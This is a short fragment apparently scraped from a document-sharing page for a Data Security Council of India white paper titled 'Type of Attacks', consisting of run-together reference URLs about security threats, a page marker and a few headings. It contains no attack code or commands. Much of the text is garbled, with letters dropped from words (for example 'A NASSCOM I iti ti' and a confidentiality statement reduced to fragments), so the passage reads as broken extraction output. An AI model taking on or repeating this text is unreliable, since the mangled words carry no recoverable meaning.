w.datacenterknowledge.com/archives/2009/08/06/twitter-is-latest-%20%20%20%20%20%20%20%20%20%20%20%20%20victim-in-series-of-attacks/http://www.zbshareware.com/threats/types_threats.htmlhttp://alcor.concordia.ca/~helpline/security/threats.htmlhttp://www.symantec.com/business/security_response/glossary/index.jsp


30/30

Type of Attacks

A NASSCOM I iti ti

DATA SECURITY COUNCIL OF INDIA

Statement of confidentialityThi d i i f i h i i d fid i l DATA SECURITY COUNCIL OF INDIA (DSCI) d h ll b di l d

type of attacks dsci white paper 1

Documents